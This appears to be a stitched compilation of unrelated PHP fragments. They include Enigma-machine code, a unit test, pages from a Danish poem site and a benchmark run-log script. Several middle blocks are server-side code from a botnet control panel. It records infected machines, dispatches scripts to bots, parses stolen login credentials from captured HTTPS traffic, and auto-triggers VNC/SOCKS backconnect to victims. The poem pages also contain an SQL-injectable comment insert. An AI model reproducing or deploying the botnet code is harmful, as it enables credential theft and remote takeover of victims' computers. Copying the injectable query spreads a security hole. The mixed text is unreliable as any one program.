public function addCable($a, $b)
{
$aPosition = toInt($a);
$bPosition = toInt($b);
$this->plugs[$aPosition] = $bPosition;
$this->plugs[$bPosition] = $aPosition;
return $this;
}
private function getProcessedReversedMapping($mapping)
{
$output = $mapping;
for ($i = 0; $i < count($mapping); $i++) {
$output[toInt($mapping[$i])] = toChar($i);
}
return $output;
}
public function testToInt()
{
$this->assertEquals(4, toInt(4));
$this->assertEquals(-4, toInt(-4));
$this->assertNull(toInt(4.1));
$this->assertNull(toInt(4.9));
$this->assertEquals(0, toInt('somestring'));
$this->assertNull(toInt([]));
$this->assertEquals(0, toInt(0));
}
function try_handle_slet_digt_submit()
{
global $user_message;
if (!isset($_POST['action'])) {
return;
}
if ($_POST['action'] === "slet") {
$did = toInt($_POST['did']);
//saving the poem
$query = query("DELETE FROM digte WHERE uid = " . module()->getUserId() . " AND id = " . $did);
//the password was changed successful
$user_message = "Digtet er nu sletet.";
}
}
/**
*
*/
function doActualLogin($id, $username, $usertype)
{
//ensure session is started.
session_start();
session_regenerate_id(true);
//priveleges are changing, so the sessionid is regenerated.
$_SESSION = array();
//Så der ikke ligger noget og roder.
$_SESSION['userid'] = toInt($id);
$_SESSION['username'] = $username;
$_SESSION['usertype'] = $usertype;
}
if (!createDir($file_path) || !($h = fopen($file_path . '/reports.txt', 'ab'))) {
die;
}
flock($h, LOCK_EX);
fwrite($h, str_repeat("=", 80) . "\r\n" . "bot_id={$botId}\r\n" . "botnet={$botnet}\r\n" . "bot_version=" . intToVersion($botVersion) . "\r\n" . "ipv4={$realIpv4}\r\n" . "country={$country}\r\n" . "type={$type}\r\n" . "rtime=" . gmdate('H:i:s d.m.Y', $curTime) . "\r\n" . "time_system=" . (empty($list[SBCID_TIME_SYSTEM]) ? 0 : gmdate('H:i:s d.m.Y', toInt($list[SBCID_TIME_SYSTEM]))) . "\r\n" . "time_tick=" . (empty($list[SBCID_TIME_TICK]) ? 0 : tickCountToText(toUint($list[SBCID_TIME_TICK]) / 1000)) . "\r\n" . "time_localbias=" . (empty($list[SBCID_TIME_LOCALBIAS]) ? 0 : timeBiasToText(toInt($list[SBCID_TIME_LOCALBIAS]))) . "\r\n" . "os_version=" . (empty($list[SBCID_OS_INFO]) ? '' : osDataToString($list[SBCID_OS_INFO])) . "\r\n" . "language_id=" . (empty($list[SBCID_LANGUAGE_ID]) ? 0 : toUshort($list[SBCID_LANGUAGE_ID])) . "\r\n" . "process_name=" . (empty($list[SBCID_PROCESS_NAME]) ? '' : $list[SBCID_PROCESS_NAME]) . "\r\n" . "process_user="******"\r\n" . "path_source=" . (empty($list[SBCID_PATH_SOURCE]) ? '' : $list[SBCID_PATH_SOURCE]) . "\r\n" . "context=\r\n" . $list[SBCID_BOTLOG] . "\r\n\r\n\r\n");
flock($h, LOCK_UN);
fclose($h);
}
if ($config['reports_jn'] === 1) {
imNotify($type, $list, $botId);
}
}
} else {
if (!empty($list[SBCID_NET_LATENCY])) {
//Стандартный запрос.
$query = "`bot_id`='{$botIdQ}', `botnet`='{$botnetQ}', `bot_version`={$botVersion}, `country`='{$countryQ}', `rtime_last`={$curTime}, " . "`net_latency`=" . (empty($list[SBCID_NET_LATENCY]) ? 0 : toUint($list[SBCID_NET_LATENCY])) . ", " . "`tcpport_s1`=" . (empty($list[SBCID_TCPPORT_S1]) ? 0 : toUshort($list[SBCID_TCPPORT_S1])) . ", " . "`time_localbias`=" . (empty($list[SBCID_TIME_LOCALBIAS]) ? 0 : toInt($list[SBCID_TIME_LOCALBIAS])) . ", " . "`os_version`='" . (empty($list[SBCID_OS_INFO]) ? '' : addslashes($list[SBCID_OS_INFO])) . "', " . "`language_id`=" . (empty($list[SBCID_LANGUAGE_ID]) ? 0 : toUshort($list[SBCID_LANGUAGE_ID])) . ", " . "`ipv4_list`='" . (empty($list[SBCID_IPV4_ADDRESSES]) ? '' : addslashes($list[SBCID_IPV4_ADDRESSES])) . "', " . "`ipv6_list`='" . (empty($list[SBCID_IPV6_ADDRESSES]) ? '' : addslashes($list[SBCID_IPV6_ADDRESSES])) . "', " . "`ipv4`='" . addslashes(pack('N', ip2long($realIpv4))) . "'";
if (!mysqlQueryEx('botnet_list', "INSERT INTO `botnet_list` SET `comment`='', `rtime_first`={$curTime}, `rtime_online`={$curTime}, {$query} " . "ON DUPLICATE KEY UPDATE `rtime_online`=IF(`rtime_last` <= " . ($curTime - $config['botnet_timeout']) . ", {$curTime}, `rtime_online`), {$query}")) {
die;
}
unset($query);
//Поиск скриптов для отправки.
$replyData = '';
$replyCount = 0;
$botIdQm = toSqlSafeMask($botIdQ);
$botnetQm = toSqlSafeMask($botnetQ);
$countryQm = toSqlSafeMask($countryQ);
$r = mysqlQueryEx('botnet_scripts', "SELECT `extern_id`, `script_bin`, `send_limit`, `id` FROM `botnet_scripts` WHERE `flag_enabled`=1 AND " . "(`countries_wl`='' OR `countries_wl` LIKE BINARY '%{$countryQm}%') AND " . "(`countries_bl` NOT LIKE BINARY '%{$countryQm}%') AND " . "(`botnets_wl`='' OR `botnets_wl` LIKE BINARY '%{$botnetQm}%') AND " . "(`botnets_bl` NOT LIKE BINARY '%{$botnetQm}%') AND " . "(`bots_wl`='' OR `bots_wl` LIKE BINARY '%{$botIdQm}%') AND " . "(`bots_bl` NOT LIKE BINARY '%{$botIdQm}%') " . "LIMIT 10");
if ($r) {
while ($m = mysql_fetch_row($r)) {
$eid = addslashes($m[0]);
//Проверяем, не достигнут ли лимит.
/** Parse accounts
* 0. Only BLT_HTTP_REQUEST & BLT_HTTPS_REQUEST against $list[SBCID_BOTLOG_TYPE]
* 1. If Match URL masks against $list[SBCID_PATH_SOURCE]
* 2. If Match params mask against $list[SBCID_BOTLOG]
* 3. Store into the DB (no dups)
* 4. Autoconnect VNC|SOCKS when set
* 5. Jabber-notify if configured
*/
function accparseplugin_parselog($list, $botId)
{
/* Only for HTTP[S] */
$type = toInt($list[SBCID_BOTLOG_TYPE]);
if ($type != BLT_HTTP_REQUEST && $type != BLT_HTTPS_REQUEST) {
return;
}
/* Match the URL */
$matched_rule = null;
$R = mysql_query('SELECT * FROM `accparse_rules` WHERE `enabled`=1 ORDER BY NULL;');
while ($R && !is_bool($r = mysql_fetch_assoc($R))) {
$wildcart = '~^' . str_replace('\\*', '.*', preg_quote(trim($r['url']), '~')) . '$~i';
if (preg_match($wildcart, $list[SBCID_PATH_SOURCE])) {
$matched_rule = $r;
mysql_free_result($R);
break;
}
}
if (is_null($matched_rule)) {
return;
}
GateLog::get()->log(GateLog::L_TRACE, 'plugin.accparse', 'Rule matched: ' . $matched_rule['alias']);
/* Match the params */
$matched_params = array();
foreach (explode("\n", $matched_rule['params']) as $param) {
$param = rtrim(trim($param), '=');
$wildcart = '~^(' . str_replace('\\*', '.*', preg_quote($param, '~')) . ')=(.+)$~ium';
if (preg_match_all($wildcart, $list[SBCID_BOTLOG], $matches, PREG_SET_ORDER)) {
foreach ($matches as $m) {
$matched_params[urldecode($m[1])] = urldecode($m[2]);
}
}
}
if (count($matched_params) == 0) {
return;
}
GateLog::get()->log(GateLog::L_TRACE, 'plugin.accparse', 'Rule params also matched: ' . count($matched_params));
/* String-format */
$matched_account = '';
asort($matched_params);
foreach ($matched_params as $k => $v) {
$matched_account .= "{$k}={$v}\n";
}
/* Store */
$q_botId = mysql_real_escape_string($botId);
$q_bot_info = mysql_real_escape_string(implode("\n", array(basename($list[SBCID_PROCESS_NAME]))));
$q_ruleid = $matched_rule['id'];
$q_account = mysql_real_escape_string($matched_account);
$q_acc_hash = md5(implode($matched_params));
$q_mtime = time();
mysql_query("INSERT INTO `accparse_accounts` VALUES(NULL, '{$q_botId}', '{$q_bot_info}', {$q_ruleid}, '{$q_account}', '{$q_acc_hash}', {$q_mtime}, 0, '') ON DUPLICATE KEY UPDATE `mtime`={$q_mtime};");
/* Dupecheck */
$affected = mysql_affected_rows();
$duplicate_account = $affected == 2;
# INSERT gives 1, UPDATE gives 2. This magic should work :)
GateLog::get()->log(GateLog::L_TRACE, 'plugin.accparse', 'Account ' . ($duplicate_account ? 'updated' : 'added'));
/* Autoconnect option */
if ($matched_rule['autoconnect']) {
if (function_exists('vncplugin_autoconnect')) {
$q_protocol = $matched_rule['autoconnect'];
GateLog::get()->log(GateLog::L_TRACE, 'plugin.accparse', 'Account backconnect: protocol=' . $q_protocol);
mysql_query("INSERT INTO `vnc_bot_connections` VALUES('{$q_botId}', {$q_protocol}, 1, 0, 0, 0) ON DUPLICATE KEY UPDATE `protocol`={$q_protocol}, `ctime`=0, `do_connect`=IF(`do_connect`=0,1,`do_connect`);");
vncplugin_autoconnect($botId);
}
}
/* Notify */
if ($duplicate_account) {
return;
}
# do nothing else
if ($matched_rule['notify'] && !empty($GLOBALS['config']['accparse_jid'])) {
$message = sprintf("Account-Parser match: %s (URL: %s)\n", $matched_rule['alias'], $matched_rule['url']);
$message .= sprintf("BotID: %s\n", $botId);
$message .= sprintf("Browser: %s\n", $list[SBCID_PROCESS_NAME]);
$message .= sprintf("URL: %s\n", $list[SBCID_PATH_SOURCE]);
$message .= "\n";
$message .= strlen($matched_account) > 100 ? substr($matched_account, 0, 100) . "\n...(see in the admin)" : $matched_account;
GateLog::get()->log(GateLog::L_TRACE, 'plugin.accparse', 'Jabber notify: ' . $GLOBALS['config']['accparse_jid']);
jabber_notify($GLOBALS['config']['accparse_jid'], $message);
}
}
public function reflect($c)
{
return $this->mapping[toInt($c)];
}
\t\t\t\t\t\t\t<th>
\t\t\t\t\t\t\t\tTitel
\t\t\t\t\t\t\t</th>
\t\t\t\t\t\t\t<th>
\t\t\t\t\t\t\t\tForfatter
\t\t\t\t\t\t\t</th>
\t\t\t\t\t\t</tr>
ASDF;
echo $header;
$query = query("SELECT d.id as did, d.titel, d.tekst, d.likes, u.id as uid, u.username FROM digte as d, users as u WHERE d.uid = u.id ORDER BY created DESC ");
while ($row = $query->fetch_array()) {
$did = html_escape($row['did']);
$uid = html_escape($row['uid']);
$enc_titel = html_escape($row['titel']);
$enc_username = html_escape($row['username']);
$likes = toInt($row['likes']);
$html = <<<ASDF
\t\t\t\t\t\t<tr>
\t\t\t\t\t\t\t<td>
\t\t\t\t\t\t\t\t{$likes}
\t\t\t\t\t\t\t</td>
\t\t\t\t\t\t\t<td>
\t\t\t\t\t\t\t\t<a href="digte_vis_digt.php?did={$did}" >{$enc_titel}</a>
\t\t\t\t\t\t\t</td>
\t\t\t\t\t\t\t<td>
\t\t\t\t\t\t\t\t{$enc_username}
\t\t\t\t\t\t\t</td>
\t\t\t\t\t\t</tr>
ASDF;
echo $html;
}
<?php
require "_conf_for_pages.php";
$did = toInt($_GET['did']);
$query = query("SELECT * FROM digte WHERE uid = " . module()->getUserId() . " AND id = " . $did);
$row = $query->fetch_array();
$titel = $row['titel'];
?>
<!DOCTYPE html>
<html>
<?php
echo get_html_head();
?>
<body>
<div class="container">
<?php
echo get_body_header("user_profile");
?>
<h1>Profile - digte</h1>
<?php
echo page_profile_topmenu();
?>
<br><br>
Er du sikker på du vil slette dette digt?<br>
<br>
<b><?php
<?php
require "_conf_for_pages.php";
$did = toInt($_GET["did"]);
try_handle_change_nyt_digt_submit();
/**
*
*/
function try_handle_change_nyt_digt_submit()
{
global $user_message;
if (isset($_POST['titel'])) {
$titel = $_POST['titel'];
$tekst = $_POST['tekst'];
$did = $_POST['did'];
$uid = module()->getUserid();
//saving the poem
$query = query("INSERT INTO digt_kommentarer (did, uid, titel, tekst) VALUES ({$did}, " . module()->loginController->getUserid() . ", '" . db()->escape_string($titel) . "', '" . db()->escape_string($tekst) . "')");
//the password was changed successful
$user_message = "Din kommentar er gemt.";
}
}
?>
<!DOCTYPE html>
<html>
<?php
echo get_html_head();
?>
<body>
<div class="container">
function digt_row_to_html($row, $max_lines = null)
{
//variabler
$did = html_escape($row['did']);
$enc_titel = html_escape($row['titel']);
$enc_username = html_escape($row['username']);
$likes = toInt($row['likes']);
//digt tekst skal kun være et par linier.
$tekst = $row['tekst'];
$length = strlen($tekst);
$kort_tekst = "";
$nl_count = 0;
for ($i = 0; $i < $length; $i++) {
if ($tekst[$i] === "\n") {
$nl_count++;
if (isset($max_lines) && $nl_count >= $max_lines) {
break;
}
}
$kort_tekst .= $tekst[$i];
}
$enc_tekst = html_escape($kort_tekst);
//vote up link skal være forskellige afhængig af om man er logget ind.
if (module()->userLoggedIn()) {
$like_function = "vote_up_digt";
} else {
$like_function = "sign_up_to_vote";
}
$html = <<<ASDF
<pre>
<b>{$enc_titel}</b>
{$enc_tekst}
Af {$enc_username} <span class="digt_like"><a href="#" onclick="{$like_function}({$did}); return false;" ><img src="images/like_triangle.gif" height="7" width="10" alt="Like this poem." ></a>{$likes}</span></pre>
ASDF;
return $html;
}
<?php
require "_conf_for_ajax.php";
//handles ajax
if (isset($_POST['ajax'])) {
$did = toInt($_POST['did']);
$uid = module()->getUserid();
//Er dette digt allerede liked af den bruger
$query = query("SELECT * FROM like_register WHERE did = {$did} and uid = {$uid}");
$vote_exists = $query->num_rows !== 0;
//vote up or down
$increment = $vote_exists ? "-1" : "+1";
$query = query("UPDATE digte SET likes = likes {$increment} WHERE id = '" . $did . "'");
//update vote register
if ($vote_exists) {
query("DELETE FROM like_register WHERE did = {$did} and uid = {$uid}");
} else {
query("INSERT INTO like_register (did, uid) VALUES ({$did}, {$uid})");
}
//end ajax request
echo "ok";
exit;
}
$uname = trimString($data["uname"], 255);
$S_SID = getMagic($os . "_" . $platform . "_" . $uname, 768);
$S_ID = getSQLID($conn, "select S_ID from System where S_SID=? LIMIT 1", $S_SID);
if ($S_ID == 0) {
// this operating system is not in the database
$sql = $conn->prepare("INSERT INTO System (S_SID, Platform, OS, Uname) VALUES (?, ?, ?, ?) ON DUPLICATE KEY UPDATE S_SID=S_SID");
if (!$sql) {
dieSQL();
}
$sql->bind_param("ssss", $S_SID, $platform, $os, $uname);
$sql->execute();
$sql->close();
$S_ID = $conn->insert_id;
if ($S_ID == 0) {
$S_ID = getSQLID($conn, "select S_ID from System where S_SID=? LIMIT 1", $S_SID);
}
}
// we can now add all of this information to the runlog
if ($C_ID == 0 or $P_ID == 0 or $V_ID == 0 or $S_ID == 0) {
die("Something went wrong adding data: {$C_ID}, {$P_ID}, {$V_ID}, {$S_ID}");
}
$exe = trimString($data["executable"], 255);
$clockspeed = toNum($data["clockspeed"], 0);
$numcores = toInt($data["numcores"], 0);
$sql = $conn->prepare("INSERT INTO RunLog (RunTime, C_ID, Executable, P_ID, S_ID, V_ID, NumCores, ClockSpeed) VALUES (now(), ?, ?, ?, ?, ?, ?, ?)");
if (!$sql) {
dieSQL();
}
$sql->bind_param("isiiiid", $C_ID, $exe, $P_ID, $S_ID, $V_ID, $numcores, $clockspeed);
$sql->execute();
$sql->close();